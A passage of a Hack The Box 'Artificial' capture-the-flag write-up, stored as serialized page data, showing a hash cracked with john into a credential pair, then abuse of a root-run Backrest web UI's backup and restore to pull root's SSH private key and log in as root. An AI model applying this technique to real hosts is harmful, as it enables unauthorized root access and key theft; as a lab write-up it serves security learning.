hash.txt\n",{"type":24,"tag":297,"props":2167,"children":2168},{"class":299,"line":326},[2169,2174],{"type":24,"tag":297,"props":2170,"children":2171},{"style":344},[2172],{"type":34,"value":2173},"john",{"type":24,"tag":297,"props":2175,"children":2176},{"style":405},[2177],{"type":34,"value":2165},{"type":24,"tag":25,"props":2179,"children":2181},{"src":2180},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F35.jpg",[],{"type":24,"tag":30,"props":2183,"children":2184},{},[2185,2187,2193],{"type":34,"value":2186},"And as a result, we get the pair ",{"type":24,"tag":66,"props":2188,"children":2190},{"className":2189,"id":86,"style":87},[85],[2191],{"type":34,"value":2192},"backrest_root:!@#$%^",{"type":34,"value":2194},". 
With this information, we can log in to our tunneled backrest interface.",{"type":24,"tag":25,"props":2196,"children":2198},{"src":2197},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F36.jpg",[],{"type":24,"tag":2200,"props":2201,"children":2203},{"id":2202},"backrest-webui",[2204],{"type":34,"value":2205},"backrest webui",{"type":24,"tag":30,"props":2207,"children":2208},{},[2209],{"type":34,"value":2210},"When we examine the interface, we don't have any other options here, so it immediately comes to mind that if we back up important folders and download them, we can get something. This relies on the backup service being able to read root-owned paths, which it evidently can on this machine. I personally proceeded by trial and error without looking at the user manual and was able to achieve what I wanted. In order:",{"type":24,"tag":30,"props":2212,"children":2213},{},[2214,2216,2222,2223,2229],{"type":34,"value":2215},"From the new repo creation section, we create a repo with the following values. (My goal is to get the ",{"type":24,"tag":66,"props":2217,"children":2219},{"className":2218},[],[2220],{"type":34,"value":2221},"id_rsa",{"type":34,"value":1410},{"type":24,"tag":66,"props":2224,"children":2226},{"className":2225},[],[2227],{"type":34,"value":2228},"\u002Froot\u002F.ssh",{"type":34,"value":2230}," folder.)",{"type":24,"tag":25,"props":2232,"children":2234},{"src":2233},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F37.jpg",[],{"type":24,"tag":25,"props":2236,"children":2238},{"src":2237},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F38.jpg",[],{"type":24,"tag":120,"props":2240,"children":2241},{},[2242],{"type":24,"tag":124,"props":2243,"children":2244},{},[2245],{"type":34,"value":2246},"Here I created a repo by filling only the first three parts.",{"type":24,"tag":30,"props":2248,"children":2249},{},[2250],{"type":34,"value":2251},"Then I tried to create a 
plan.",{"type":24,"tag":25,"props":2253,"children":2255},{"src":2254},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F39.jpg",[],{"type":24,"tag":120,"props":2257,"children":2258},{},[2259],{"type":24,"tag":124,"props":2260,"children":2261},{},[2262],{"type":34,"value":2263},"I did this by filling in the first three parts. In the 2nd part, we select the repo we created in step 1.",{"type":24,"tag":30,"props":2265,"children":2266},{},[2267],{"type":34,"value":2268},"As a result, we get this page.",{"type":24,"tag":25,"props":2270,"children":2272},{"src":2271},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F40.jpg",[],{"type":24,"tag":30,"props":2274,"children":2275},{},[2276,2278,2284],{"type":34,"value":2277},"Now let's click on ",{"type":24,"tag":66,"props":2279,"children":2281},{"className":2280},[],[2282],{"type":34,"value":2283},"backup now",{"type":34,"value":2285}," from here. Now our backup has been taken, let's proceed from the repo section and restore this backup we took.",{"type":24,"tag":25,"props":2287,"children":2289},{"src":2288},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F41.jpg",[],{"type":24,"tag":30,"props":2291,"children":2292},{},[2293],{"type":34,"value":2294},"Now let's download the restored file.",{"type":24,"tag":25,"props":2296,"children":2298},{"src":2297},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F42.jpg",[],{"type":24,"tag":30,"props":2300,"children":2301},{},[2302],{"type":34,"value":2303},"Now this file will have our ssh key for root: the backup was able to read the root-only .ssh folder, so the backrest service evidently runs with root privileges, and anyone who can log in to its web UI can read any file on the host. 
With this, we can directly connect as root with ssh.",{"type":24,"tag":25,"props":2305,"children":2307},{"src":2306},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F43.jpg",[],{"type":24,"tag":25,"props":2309,"children":2311},{"src":2310},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F44.jpg",[],{"type":24,"tag":25,"props":2313,"children":2317},{"src":2314,":height":2315,":width":2316},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002Fköksal-baba.gif","445","498",[],{"type":24,"tag":2319,"props":2320,"children":2321},"style",{},[2322],{"type":34,"value":2323},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 
var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":367,"depth":367,"links":2325},[2326,2327,2328],{"id":48,"depth":326,"text":51},{"id":216,"depth":326,"text":219},{"id":1249,"depth":326,"text":1252,"children":2329},[2330,2331],{"id":1256,"depth":335,"text":1259},{"id":1364,"depth":335,"text":1367,"children":2332},[2333],{"id":2202,"depth":367,"text":2205},"markdown","content:posts:2025:htb-artificial-writeup.md","content","posts\u002F2025\u002Fhtb-artificial-writeup.md","posts\u002F2025\u002Fhtb-artificial-writeup","md","\u002Fposts",[2342,2346],{"_path":2343,"title":2344,"date":2345},"\u002F2025\u002Fhtb-cap-writeup","HTB - Cap","2025-10-27T15:49:55.000Z",{"_path":2347,"title":2348,"date":2349},"\u002F2025\u002Ftryhackme-mrrobot-writeup","TryHackMe - Mr.Robot","2025-11-05T06:21:29.000Z",1776877918974]